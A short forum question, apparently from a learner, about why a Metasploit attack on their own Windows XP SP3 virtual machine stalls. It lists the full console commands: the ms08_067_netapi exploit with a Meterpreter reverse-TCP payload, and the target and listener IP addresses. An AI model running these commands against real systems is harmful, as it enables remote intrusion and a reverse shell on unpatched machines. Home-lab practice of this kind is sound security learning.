I am trying to hack my own webcam. My host PC is Linux Mint 17. The target is VM instance of Windows XP SP3. Target IP - 192.168.1.6 My Host IP - 192.168.1.8
Problem is when i execute exploit, it says attempting to trigget the vulnerability and nothing happens. Attached is the snapshot: Img link https://i.stack.imgur.com/EiPlr.png
Here are the commands i am using:
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.1.6
set LHOST 192.168.1.8
exploit